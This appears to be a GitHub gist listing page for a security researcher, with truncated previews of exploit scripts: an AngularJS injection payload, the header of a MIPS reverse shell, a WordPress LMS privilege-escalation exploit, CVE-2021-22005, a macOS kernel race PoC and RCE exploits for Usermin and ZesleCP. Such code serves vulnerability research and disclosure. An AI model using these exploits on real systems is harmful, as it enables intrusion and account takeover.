This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {{x={"n":"".constructor.prototype};x["n"].charAt=[].join;$eval("x=alert(\"pwned --> numanturle\")");}} |
numanturle
/ shellcode.c
Created
February 25, 2022 22:14
reference : https://east-trowel-102.notion.site/CVE-2021-XXXX-rce-via-crafted-payload-in-an-ipv6-address-input-field-hidden-EN-98e24b6f841043fba17ec4627c34f5d1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Simple Persistent Reverse Shell | |
| // Compile for MIPSBE using the following steps: | |
| // 1) cp reverse_shell_mipsbe.c /tmp/ | |
| // 2) using buildroot toolchain for compile mipsel-buildroot-linux-uclibc-gcc-10.3.0 | |
| // 4) cd /tmp ; output/host/bin/mipsel-buildroot-linux-uclibc-gcc-10.3.0 -static /home/sasaga/Escritorio/shellcode/rev.c -o /home/sasaga/Escritorio/shellcode/rev | |
| // Outside Docker: | |
| // 5) cp /tmp/rev . | |
| #include <sys/types.h> | |
| #include <sys/socket.h> |
numanturle
/ gist:e1e85b9eaa73d7a427e355356d507bbb
Created
February 24, 2022 09:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 192.168.0.28 | |
| 192.168.0.29 | |
| 192.168.0.197 | |
| 192.168.0.99 | |
| 192.168.0.210 | |
| 192.168.0.212 | |
| 192.168.0.211 | |
| 192.168.0.249 |
numanturle
/ Exploit.js
Created
January 30, 2022 10:51
MasterStudy LMS – WordPress LMS Plugin 2.7.5 - Privilege Escalation (Unauthenticated)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function randomInt(min, max) { | |
| return Math.floor(Math.random() * (max - min + 1)) + min; | |
| } | |
| jQuery(document).ready(function($){ | |
| username = "poctesting"+randomInt(1,1337); | |
| password_poc = "S3cr3t"+randomInt(1,1337); | |
| nonce = stm_lms_nonces.stm_lms_register | |
| post_data = { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ms-cxh-full:// | |
| ms-cxh:/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .data | |
| /* Data segment: define our message string and calculate its length. */ | |
| msg: | |
| .ascii "Hello, ARM64!\n" | |
| len = . - msg | |
| .text | |
| /* Our application's entry point. */ |
numanturle
/ CVE-2021-22005.py
Created
October 4, 2021 12:28
— forked from testanull/asdklajsdlkajsdlkajsdakjsdhalskdasdioasiodaklsd.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import random | |
| import string | |
| import sys | |
| import time | |
| import requests | |
| import urllib3 | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
| def id_generator(size=6, chars=string.ascii_lowercase + string.digits): |
numanturle
/ poc.c
Created
September 16, 2021 08:44
— forked from infernalheaven/poc.c
macOS 11.5.2/iOS 14.7.1 Kernel Race Condition poc
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Written By Pan ZhenPeng(@peterpan980927) of Alibaba Security Pandora Lab | |
| use it on macOS: cc poc.c -o poc while True; do ./poc ; done | |
| */ | |
| #include <errno.h> | |
| #include <signal.h> | |
| #include <fcntl.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> |
numanturle
/ usermin.py
Created
August 27, 2021 15:57
Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # -*- coding: utf-8 -*- | |
| # Usermin - Remote Code Execution (Authenticated) ( Version 1.820 ) | |
| # author: twitter.com/numanturle | |
| # usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD | |
| # https://youtu.be/wiRIWFAhz24 | |
| import argparse,requests,warnings,json,re | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning |
numanturle
/ zeslecp.py
Created
August 27, 2021 13:21
ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # -*- coding: utf-8 -*- | |
| # ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 ) | |
| # author: twitter.com/numanturle | |
| # usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD | |
| # https://www.youtube.com/watch?v=5lTDTEBVq-0 | |
| import argparse,requests,warnings,json,random,string | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning |